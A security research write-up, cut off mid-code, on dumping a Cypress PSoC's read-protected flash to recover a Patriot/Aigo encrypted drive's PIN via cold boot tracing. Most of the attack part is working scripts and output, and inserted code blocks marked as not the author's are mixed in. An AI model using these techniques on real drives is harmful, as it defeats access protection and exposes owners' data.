Reversing and hacking the Aigo self-encrypting HDD. Part 2: Dumping the Cypress PSoC

This is the second and final part of the article on hacking external self-encrypting drives. Let me remind you that a colleague recently brought me a Patriot (Aigo) SK8671 hard drive, that I decided to reverse it, and that I am now sharing what came out of it. Before reading further, make sure you have read the first part of the article.

4. Starting to dump the PSoC's internal flash
5. The ISSP protocol
- 5.1. What is ISSP
- 5.2. Demystifying the vectors
- 5.3. Communicating with the PSoC
- 5.4. Identifying on-chip registers
- 5.5. Security features
6. First (failed) attack: ROMX
7. Second attack: cold boot tracing
- 7.1. Setup
- 7.2. Reading the results
- 7.3. Reconstructing the flash binary
- 7.4. Finding the PIN storage address
- 7.5. Dumping block number 126
- 7.6. Recovering the PIN code
8. What's next?
9. Conclusion



4. Starting to dump the PSoC's internal flash

So, everything indicates (as we established in [part one]()) that the PIN code is stored deep inside the PSoC. We therefore have to read that flash. Ahead of us are the following tasks:

  • take control of the "communication" with the microcontroller;
  • find a way to check whether this "communication" is protected against reading from outside;
  • find a way to bypass the protection.

There are two places where it makes sense to look for the valid PIN:

  • the internal flash memory;
  • SRAM, where the PIN may be kept for comparison with the PIN the user types in.

Looking ahead, I note that I did manage to dump the PSoC's internal flash, bypassing its protection with a hardware attack called "cold boot tracing", after reverse engineering the undocumented parts of the ISSP protocol. This let me dump the real PIN code.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

The final script (psoc.py) is in my cypress_psoc_tools repository on GitHub.

5. The ISSP protocol

5.1. What is ISSP

"Communicating" with a microcontroller can mean different things, and it differs from vendor to vendor: usually you talk to the chip over a vendor-specific serial protocol (for example ICSP for Microchip's PIC).

Cypress has its own protocol for this, called ISSP (In-System Serial Programming protocol), which is partially described in the technical specification. Patent US7185162 gives some more details. There is also an open source equivalent called HSSP (we will use it a bit later). ISSP works like this:

  • reset the PSoC;
  • output a magic number on the PSoC's data pin to enter external programming mode;
  • send commands, which are long bit strings called "vectors".

The ISSP documentation defines these vectors only for a small set of commands:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111, where dddddddd = block #
  • BULK-ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1, where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111, where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, where DDDDDDDDDDDDDDDD = data out: the device checksum
  • ERASE BLOCK

For example, the Initialize-2 vector:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

All vectors have the same length: 22 bits. The HSSP documentation adds this about ISSP: "An ISSP vector is nothing but a bit sequence representing a set of instructions."

5.2. Demystifying the vectors

Let's see what is going on here. At first I thought the vectors were raw M8C instructions, but after checking that hypothesis I found that the opcodes did not match.

Then I googled the vector above and found this research, whose author, while not going into detail, gives useful hints: "Each instruction starts with three bits that correspond to one of four mnemonics (read from RAM, write to RAM, read register, write register). Then there are 8 address bits, followed by 8 data bits (read or write), and finally three stop bits."

Then I was able to gather some very useful information from the Supervisory ROM (SROM) section of the technical manual. The SROM is a hard-coded ROM in the PSoC that provides service functions (similar to syscalls) to program code running in user space:

  • 00h: SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: EraseBlock
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Calibrate0
  • 09h: Calibrate1

By matching the vector names against the SROM functions, we can map the various operations supported by this protocol to the parameters the SROM expects. Thanks to this, we can decode the first three bits of the ISSP vectors:

  • 100 => "wrmem"
  • 101 => "rdmem"
  • 110 => "wrreg"
  • 111 => "rdreg"

However, a full understanding of the on-chip mechanisms can only be obtained by talking to the PSoC directly.

5.3. Communicating with the PSoC

Since Dirk Petrautsky had already ported Cypress's HSSP code to Arduino, I used an Arduino Uno to connect to the ISSP connector of the keyboard board.

Note that in the course of my research I modified Dirk's code a bit. You can find my changes on GitHub: here is the corresponding Python script for talking to the Arduino, in my cypress_psoc_tools repository.

So, using the Arduino, I first used the "official" vectors to "communicate". I tried to read the internal ROM with the VERIFY command. As I expected, I could not. Probably because the read protection bits are enabled in the flash.

Then I made my own simple vectors for writing and reading memory and registers. Note that we can read the whole SROM even though the flash is protected!

5.4. Identifying on-chip registers

After looking at the "disassembled" vectors, I found that the device uses undocumented registers (0xF8-0xFA) to specify M8C opcodes, which are executed directly, bypassing the protection. This allowed me to run various opcodes such as "ADD", "MOV A, X", "PUSH" or "JMP". Thanks to them (by looking at the side effects they have on the registers) I was able to determine which of the undocumented registers were actually the standard registers (A, X, SP and PC).

As a result, the "disassembled" code produced by the HSSP_disas.rb tool looks like this (I added comments for clarity):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # clear flags
[DE C0 1C] wrreg SP (f6), 0x00      # reset SP
[9F 07 5C] wrmem KEY1, 0x3A         # mandatory argument for SSC
[9F 20 7C] wrmem KEY2, 0x03         # likewise
[DE A0 1C] wrreg PCh (f5), 0x00     # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM pointer for the output data
[DF 26 1C] wrreg opc1 (f9), 0x30    # opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40    # opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01      # BLOCK ID for the SSC call
[DE 00 DC] wrreg A (f0), 0x06       # "syscall" number: TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00    # opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # undocumented operation: execute external opcode
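To check the decoding rules of sections 5.1-5.4 against the listing, here is an added example (my code, not the article's and not part of cypress_psoc_tools or HSSP_disas.rb): a small Python 3 encoder/decoder for the 22-bit vectors. It assumes the layout the text derives (3-bit mnemonic, 8-bit address, 8-bit data and three stop bits for writes; a Z turnaround, eight PSoC-driven D bits, Z and a 1 for reads), uses the register and RAM names from the listing, and in exec_opcode_vectors() the order of the register writes before the CPU_SCR0 trigger is my assumption.

```python
# Added example (mine, not code from the article or from cypress_psoc_tools):
# an encoder/decoder for the 22-bit ISSP vectors, using the layout derived
# above:  3-bit mnemonic | 8-bit address | 8-bit data | 111  for writes, and
#         3-bit mnemonic | 8-bit address | Z | 8 D bits | Z | 1  for reads.
# Register and RAM names are the ones the disassembly listing uses.

MNEMONICS = {"100": "wrmem", "101": "rdmem", "110": "wrreg", "111": "rdreg"}
MNEMONIC_BITS = {name: bits for bits, name in MNEMONICS.items()}

REG_NAMES = {0xF0: "A", 0xF3: "X", 0xF4: "PCl", 0xF5: "PCh", 0xF6: "SP",
             0xF7: "CPU_F", 0xF8: "opc0", 0xF9: "opc1", 0xFA: "opc2",
             0xFF: "CPU_SCR0"}
RAM_NAMES = {0xF8: "KEY1", 0xF9: "KEY2", 0xFA: "BLOCKID", 0xFB: "POINTER"}

# The Initialize-2 vector from the ISSP documentation, as listed above.
INIT2 = [
    "1101111011100000000111", "1101111011000000000111",
    "1001111100000111010111", "1001111100100000011111",
    "1101111010100000000111", "1101111010000000011111",
    "1001111101110000000111", "1101111100100110000111",
    "1101111101001000000111", "1001111101000000001111",
    "1101111000000000110111", "1101111100000000000111",
    "1101111111100010010111",
]


def decode_vector(bits):
    """Return (mnemonic, address, data) for one 22-bit vector.

    data is None for read vectors: their D bits are driven by the PSoC,
    so the vector itself carries no value."""
    if len(bits) != 22:
        raise ValueError("ISSP vectors are 22 bits, got %d" % len(bits))
    mnemonic = MNEMONICS[bits[0:3]]
    addr = int(bits[3:11], 2)
    if bits[11] == "Z":                          # read: Z DDDDDDDD Z 1
        return mnemonic, addr, None
    return mnemonic, addr, int(bits[11:19], 2)   # write: dddddddd 111


def encode_write(mnemonic, addr, data):
    """Build a wrmem/wrreg vector."""
    if mnemonic not in ("wrmem", "wrreg"):
        raise ValueError("not a write mnemonic: %s" % mnemonic)
    return MNEMONIC_BITS[mnemonic] + format(addr, "08b") + format(data, "08b") + "111"


def encode_read(mnemonic, addr):
    """Build a rdmem/rdreg vector; D marks bits the PSoC drives, Z the turnaround."""
    if mnemonic not in ("rdmem", "rdreg"):
        raise ValueError("not a read mnemonic: %s" % mnemonic)
    return MNEMONIC_BITS[mnemonic] + format(addr, "08b") + "Z" + "D" * 8 + "Z1"


def vector_hex(bits):
    """The [XX XX XX] form of the listings: the 22 bits left-aligned in 3 bytes
    (Z and D positions shown as 0)."""
    value = int((bits + "00").replace("Z", "0").replace("D", "0"), 2)
    return "%02X %02X %02X" % (value >> 16, (value >> 8) & 0xFF, value & 0xFF)


def disassemble(bits):
    """One line in the style of the HSSP_disas.rb output above."""
    mnemonic, addr, data = decode_vector(bits)
    if mnemonic.endswith("reg"):
        label = "%s (%02x)" % (REG_NAMES[addr], addr) if addr in REG_NAMES else "0x%02X" % addr
    else:
        label = RAM_NAMES.get(addr, "0x%02X" % addr)
    line = "[%s] %s %s" % (vector_hex(bits), mnemonic, label)
    return line if data is None else line + ", 0x%02X" % data


def exec_opcode_vectors(opcodes):
    """Vectors that make the core run up to three externally supplied M8C
    opcode bytes, as the tail of the listing above does: load opc0..opc2
    (0xF8..0xFA, padded with NOP 0x40), then write 0x12 to CPU_SCR0 (0xFF).
    The order of the register writes before the trigger is my assumption."""
    if not 1 <= len(opcodes) <= 3:
        raise ValueError("1 to 3 opcode bytes")
    padded = list(opcodes) + [0x40] * (3 - len(opcodes))
    vectors = [encode_write("wrreg", 0xF8 + i, op) for i, op in enumerate(padded)]
    vectors.append(encode_write("wrreg", 0xFF, 0x12))
    return vectors


if __name__ == "__main__":
    print("--== init2 ==--")
    for v in INIT2:
        print(disassemble(v))
    print("--== ROMX, HALT, NOP ==--")
    for v in exec_opcode_vectors([0x28, 0x30, 0x40]):
        print(disassemble(v))
```

Running it reproduces the init2 listing line for line, which is the check that the 3/8/8/3 split and the "pad to 24 bits" hex convention are right; the same encoder builds the opcode-execution sequence that the ROMX attempt below relies on.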

5.5. Security features

At this point I could already communicate with the PSoC, but I had no reliable information about the flash protection. I was quite surprised that Cypress gives the device user no way at all to check whether protection is enabled. I dug deeper into Google and found out that the HSSP code provided by Cypress had been updated after Dirk published his modification. And there it was: a new vector had appeared:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00     # unknown arguments
[9F E0 1C] wrmem 0xFF, 0x00     # likewise
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # undocumented syscall!
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Using this vector (see read_security_data in psoc.py), we get all the security bits in SRAM at 0x80, with two bits per protected block.

The result is disappointing: everything is protected in "disable external read and write" mode. So we can neither read anything from the flash, nor write anything to it (to plant a ROM dumper there, for example). And the only way to disable the protection is to erase the whole chip. 🙁

6. First (failed) attack: ROMX

Still, we can try the following trick: since we are able to execute arbitrary opcodes, why not execute ROMX, the instruction used to read flash memory? This approach has a fair chance of success, because the SROM ReadBlock function (the one the vectors use) checks whether it is being called from ISSP, whereas the ROMX opcode presumably has no such check. So here is the Python code (after adding a few helper classes to the Arduino code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = high byte of the address
    write_reg(0xF3, i&0xFF)     # X = low byte of the address
    exec_opcodes("\x28\x30\x40")    # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print the ROM byte

Unfortunately this code does not work. 🙁 Or rather, it works, but what we get on the output is our own opcodes (0x28 0x30 0x40)! I do not think this behaviour of the device is part of the read protection. It looks more like an engineering trick: while executing external opcodes, the ROM bus is switched to a temporary buffer.

7. Second attack: cold boot tracing

Since the ROMX trick did not work, I started thinking about another variant of it, described in the paper "Shedding too much Light on a Microcontroller's Firmware Protection".

7.1. Setup

The ISSP documentation gives the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This calls SROM function 0x07, as described in the documentation (emphasis mine):

Checksum verification function. Computes a 16-bit checksum of the number of blocks specified by the user in a single flash bank, starting from block zero. The BLOCKID parameter is used to pass the number of blocks to include in the checksum computation. A value of "1" computes the checksum over block zero only, while "0" causes the checksum of all 256 blocks of the flash bank to be computed. The 16-bit checksum is returned via KEY1 and KEY2. The KEY1 parameter holds the low 8 bits of the checksum and the KEY2 parameter holds the high 8 bits. On devices with several flash banks, the checksum function is called for each bank separately. The bank it operates on is selected by the FLS_PR1 register (by setting the bit that corresponds to the desired bank).

Note that this is a plain checksum: the bytes are simply added one after another; no tricky CRC. Moreover, knowing that the M8C core has a very small register set, I assumed that during the checksum computation the intermediate values would be written to the same variables that are output at the end: KEY1 (0xF8) / KEY2 (0xF9).

So in my head the attack looked like this:

  1. We connect via ISSP.
  2. We start the checksum computation with the CHECKSUM-SETUP vector.
  3. We reset the processor after a known time T.
  4. We read the RAM to get the checksum C.
  5. Repeat steps 3 and 4, increasing T a little each time.
  6. We recover the flash contents by subtracting the previous checksum C from the current one.

However, there is a problem: the Initialize-1 vector, which we have to send after the reset, overwrites KEY1 and KEY2:

1100101000000000000000  # magic that puts the PSoC into programming mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A         # the checksum is overwritten here
[9F 20 7C] wrmem KEY2, 0x03         # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09       # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This code wipes our precious checksum by calling Calibrate1 (SROM function 9)... Could we perhaps just send the magic number (from the beginning of the code above) to enter programming mode, and then read the SRAM? And yes, it works! The Arduino code that implements this is quite simple:

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

  1. Read checksum_delay.
  2. Start the checksum computation (send_checksum_v).
  3. Wait for the given time, keeping in mind the following problems:
    • I lost a lot of time until I figured out that delayMicroseconds only works correctly for delays of at most 16383 μs;
    • and then I lost as much time again until I realized that delayMicroseconds, when passed 0, misbehaves!
  4. Reset the PSoC into programming mode (we only send the magic number, without the initialization vectors).

The final Python code:

import os, struct
import serial   # pyserial; reset_psoc, send_vectors, read_regb, read_ramb are helpers from psoc.py

for delay in range(0, 150000):  # delay in microseconds
    for i in range(0, 10):      # number of reads for each delay
        try:
            reset_psoc(quiet=True)  # reset and enter programming mode
            send_vectors()          # send the initialization vectors
            ser.write("\x85"+struct.pack(">I", delay)) # compute the checksum + reset after the delay
            res = ser.read(1)       # read the Arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # reopen the serial port
            continue
        print "%05d %02X %02X %02X" % (delay,      # read the RAM bytes
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

In short, what this code does:

  1. Resets the PSoC (and sends the magic number).
  2. Sends all the initialization vectors.
  3. Calls the Arduino function Cmnd_STK_START_CSUM (0x85), passing the delay in microseconds as a parameter.
  4. Reads the checksum (0xF8 and 0xF9) and the undocumented register 0xF1.

This code is executed 10 times for every 1 μs of delay. 0xF1 is included because it was the only register that changed during the checksum computation. It is probably some kind of temporary used by the arithmetic unit. Note the ugly hack I use to reset the Arduino with picocom when it stops showing signs of life (no idea why it does that).

7.2. Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 - the unknown register mentioned above
                # F8 - low byte of the checksum
                # F9 - high byte of the checksum

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # the checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1st byte: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte: 0xE7-0x80 = 0x67
00057 CC E7 00
00057 01 17 01  # no idea what is going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 again?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Ah, got it! That is the carry into the high byte
00063 01 17 01
[...]
00075 CC 17 01  # So, 0x117-0xE7 = 0x30

That said, we have a problem: since we are working with a real checksum, a null byte does not change the value we read. However, since the whole checksum computation (8192 bytes) takes 0.1478 s (with slight variations on each run), which corresponds to about 18.04 μs per byte, we can use that timing to look at the checksum value at the right moment. During the first runs everything was easy to read, because the timing was always the same. The end of the dump, however, is less accurate, because the "small deviations" of each run add up and become significant:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

That is 10 dumps for every microsecond of delay. The total time to dump all 8192 bytes of the flash is about 48 hours.
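As an added example (mine, not the article's), the following Python 3 simulation plays the procedure of sections 7.1 and 7.2 back against a constructed flash image and rebuilds the bytes from the sampled checksums. It goes one step beyond the text by inferring zero bytes from the timing gap between two checksum changes and by majority-voting the repeated reads at each delay. The per-byte period, the start offset, the jitter model and the flash contents are assumptions, not measurements; the first three bytes are chosen to equal the 0x80, 0x67, 0x30 of the listing so the carry case is the same.

```python
"""Added example (mine, not from the article): a simulation of the cold boot
tracing of sections 7.1 and 7.2, and a routine that rebuilds flash bytes from
the sampled checksums.

Assumptions (all mine): the CheckSum SROM call is a plain 16-bit byte sum, as
the documentation quoted above says; it adds one byte every PERIOD_US
microseconds (the page measured about 18.04 us per byte) starting T0_US after
the vector is sent; run-to-run timing jitter is a small random scaling of
that period.  The flash image is constructed; its first three bytes are the
0x80, 0x67, 0x30 recovered in the listing above so the carry case matches."""
import random
from collections import Counter

PERIOD_US = 18.04   # ~0.1478 s / 8192 bytes, as measured on the page
T0_US = 16.0        # delay at which the listing shows the checksum reset to 0

# Constructed flash: zero bytes (invisible in the sum), bytes that carry into KEY2.
FLASH = (bytes([0x80, 0x67, 0x30, 0x00, 0x00, 0xFF, 0x01, 0x00, 0x7F])
         + bytes(range(0xA0, 0xE0)) + bytes([0x00, 0x12]))


def checksum16(data):
    """Value of KEY2:KEY1 after the SROM has added len(data) bytes."""
    return sum(data) & 0xFFFF


def simulate_reads(flash, delays, repeats=1, jitter=0.0, seed=1):
    """Stand-in for the Arduino loop: for each delay, `repeats` times, start
    the checksum, reset the PSoC after `delay` us and read KEY2:KEY1 back.
    Returns (delay_us, checksum) pairs, like the DELAY/F8/F9 columns above."""
    rng = random.Random(seed)
    trace = []
    for delay in delays:
        for _ in range(repeats):
            period = PERIOD_US * (1.0 + rng.uniform(-jitter, jitter))
            n_bytes = int(max(0.0, delay - T0_US) // period)
            trace.append((delay, checksum16(flash[:min(n_bytes, len(flash))])))
    return trace


def majority_trace(trace):
    """Collapse the repeated reads at each delay to the most frequent value."""
    by_delay = {}
    for delay, csum in trace:
        by_delay.setdefault(delay, []).append(csum)
    return sorted((d, Counter(c).most_common(1)[0][0]) for d, c in by_delay.items())


def recover_bytes(trace, period_us=PERIOD_US, t0_us=T0_US):
    """Rebuild flash bytes from a dense checksum trace.

    Every change of the 16-bit value is one non-zero byte, its value the
    16-bit difference (which absorbs the carry into KEY2).  A change that
    arrives k periods after the previous one means k-1 bytes of 0x00 passed
    unseen in between, which resolves the 'a null byte does not change the
    value' problem.  Trailing zero bytes cannot be recovered this way."""
    recovered = []
    prev_t, prev_c = t0_us, 0
    for t, c in majority_trace(trace):
        delta = (c - prev_c) & 0xFFFF
        if delta == 0 or delta > 0xFF:
            continue    # same state, or a jitter flap back to an earlier state
        periods = int(round((t - prev_t) / period_us))
        recovered.extend([0x00] * max(0, periods - 1))
        recovered.append(delta)
        prev_t, prev_c = t, c
    return recovered


def trace_delays(flash, step_us=1):
    """Delays covering the whole image plus a little margin."""
    return range(0, int(T0_US + PERIOD_US * (len(flash) + 2)), step_us)


if __name__ == "__main__":
    clean = recover_bytes(simulate_reads(FLASH, trace_delays(FLASH)))
    noisy = recover_bytes(simulate_reads(FLASH, trace_delays(FLASH), repeats=5, jitter=0.0003))
    print("clean :", " ".join("%02x" % b for b in clean))
    print("jitter:", " ".join("%02x" % b for b in noisy))
    print("match :", clean == list(FLASH), noisy == list(FLASH))
```

Each checksum change re-anchors the clock, so the run-to-run drift the author ran into only matters across runs of consecutive 0x00 bytes, where the count is inferred from the number of elapsed periods. The back-and-forth flapping visible in the 134 ms listing is what the majority vote is for, and a flap back to an earlier state is skipped because its 16-bit delta exceeds 0xFF.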

7.3. Reconstructing the flash binary

I have not finished writing the code that would reconstruct the flash program code while taking the constant deviations into account. However, I have already recovered the beginning of it. To make sure I got it right, I disassembled it with m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

Looks plausible!

7.4. Finding the PIN storage address

Now that we can read the checksum at any moment we like, we can look at how and when it changes when we:

  • enter a wrong PIN code;
  • change the PIN code.

First, to find the storage address, I took a checksum dump in 10 ms steps after a reset. Then I entered a wrong PIN and did the same again.

The result was not very pleasant, since there were many changes. But in the end I was able to determine that the checksum changed somewhere between 120000 μs and 140000 μs of delay. The "pincode" I displayed there, though, was completely wrong, because of delayMicroseconds, which does strange things when passed 0.

Then, after some three hours, I remembered that the SROM CheckSum call takes an argument specifying the number of blocks to checksum! So we can easily localize the storage address of the PIN code and of the "wrong attempts" counter, to within a 64-byte block.

My first run produced the following results:

[image]

Then I changed the PIN code from "123456" to "1234567" and got:

[image]

So the PIN code and the wrong-attempt counter appear to be stored in block No. 126.
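Added example (mine, not the article's): the localization trick of this section, simulated in Python 3 over constructed before/after flash images. Assumed: a bank of 128 blocks of 64 bytes (the page's 125 x 64 arithmetic), BLOCKID = n covering blocks 0..n-1 and 0 the whole bank, the plain 16-bit byte sum, the PIN's keypad codes and a counter byte (0xFF, decremented per failed attempt) living in block 126, and a hypothetical counter offset COUNTER_OFFSET. Going a little beyond the text, it also isolates each block's own sum from consecutive BLOCKID results and counts the failed attempts from the drop in the block's sum.

```python
"""Added example (mine, not from the article): locating the flash block that
holds the PIN and the wrong-attempt counter with the BLOCKID argument of the
SROM CheckSum call, as section 7.4 describes.

Assumptions (mine): a bank of 128 blocks of 64 bytes (the 125 x 64 arithmetic
used on the page), BLOCKID = n covering blocks 0..n-1 and 0 meaning the whole
bank, the CheckSum result being the plain 16-bit byte sum, and a counter byte
in block 126 that starts at 0xFF and drops by one per failed attempt, as the
page observed.  Flash images are constructed; the keypad codes are the ones
dump_pin() maps to digits; COUNTER_OFFSET is hypothetical."""
import random

BLOCK_SIZE = 64
N_BLOCKS = 128
PIN_BLOCK = 126          # where the page found the PIN and the counter
COUNTER_OFFSET = 63      # assumed position of the counter inside the block

# digit -> keypad scan code, the inverse of the pin_map in dump_pin()
KEYPAD = {"0": 0x24, "1": 0x25, "2": 0x26, "3": 0x27, "4": 0x20,
          "5": 0x21, "6": 0x22, "7": 0x23, "8": 0x2C, "9": 0x2D}


def checksum16(data):
    return sum(data) & 0xFFFF


def srom_checksum(flash, blockid):
    """Model of SROM function 0x07 over the first `blockid` blocks."""
    n_blocks = N_BLOCKS if blockid == 0 else blockid
    return checksum16(flash[:n_blocks * BLOCK_SIZE])


def block_sums(flash):
    """One CheckSum call per BLOCKID = 1..N; consecutive differences isolate
    each block's own 16-bit sum, which is all the attacker gets to compare."""
    prefix = [0] + [srom_checksum(flash, n) for n in range(1, N_BLOCKS + 1)]
    return [(prefix[i + 1] - prefix[i]) & 0xFFFF for i in range(N_BLOCKS)]


def changed_blocks(before, after):
    """Blocks whose sum differs between two images.  A change that preserves a
    block's sum (two bytes swapped, +1 here and -1 there) stays invisible."""
    a, b = block_sums(before), block_sums(after)
    return [i for i in range(N_BLOCKS) if a[i] != b[i]]


def failed_attempts_between(before, after, block=PIN_BLOCK):
    """With a counter that only ever decrements by one, the drop in the
    block's sum is the number of failed attempts between the two dumps."""
    return (block_sums(before)[block] - block_sums(after)[block]) & 0xFFFF


def make_flash(pin, attempts_left, seed=7):
    """Constructed image: pseudo-random firmware with the PIN's keypad codes
    and the counter stored in block 126.  Same seed => same background."""
    rng = random.Random(seed)
    flash = bytearray(rng.randrange(256) for _ in range(N_BLOCKS * BLOCK_SIZE))
    base = PIN_BLOCK * BLOCK_SIZE
    flash[base:base + 16] = bytes(16)                  # PIN buffer, zero padded
    codes = [KEYPAD[d] for d in pin]
    flash[base:base + len(codes)] = bytes(codes)
    flash[base + COUNTER_OFFSET] = attempts_left
    return bytes(flash)


if __name__ == "__main__":
    fresh = make_flash("123456", 0xFF)
    after_two_failures = make_flash("123456", 0xFD)
    new_pin = make_flash("1234567", 0xFF)
    print("changed by wrong attempts:", changed_blocks(fresh, after_two_failures))
    print("failed attempts:", failed_attempts_between(fresh, after_two_failures))
    print("changed by PIN change:", changed_blocks(fresh, new_pin))
```

On the real device each of the 128 BLOCKID values costs one CHECKSUM-SETUP, reset and RAM read, so the whole pass is a few seconds of bus traffic rather than hours of delay sweeping; the price is that a modification which leaves a block's byte sum unchanged cannot be seen this way.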

7.5. Dumping block number 126

Block #126 should show up somewhere around 125x64x18 = 144000 μs after the start of the checksum computation in my full dump, and that looks plausible. Then, after manually filtering out many invalid positions (caused by the accumulation of the "small timing deviations"), I found these bytes (at a delay of 145527 μs):

[image]

Clearly, the PIN code is stored without any obfuscation! These values are, of course, not ASCII, but by the look of them they are the scan codes read from the capacitive keyboard.

Finally, I ran a few more tests to find out where the wrong-attempt counter is stored. Here is the result:

[image]

0xFF means "15 attempts", and it is decremented on every failed attempt.

7.6. Recovering the PIN code

Here is my ugly code that puts all of the above together:

def dump_pin():
  # keypad scan codes found in block 126 -> digits
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
